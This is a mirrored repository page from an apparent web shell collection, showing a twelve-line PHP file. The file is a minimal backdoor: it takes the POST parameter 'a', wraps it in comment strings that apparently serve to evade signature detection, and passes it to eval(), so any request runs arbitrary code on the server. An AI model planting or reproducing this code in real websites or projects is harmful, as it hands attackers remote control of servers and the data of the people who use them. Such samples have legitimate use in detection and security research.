mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
12 lines
97 B
PHP
12 lines
97 B
PHP
<?php
|
|
|
|
function x()
|
|
{
|
|
|
|
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
|
|
|
|
}
|
|
|
|
eval(x());
|
|
?>
|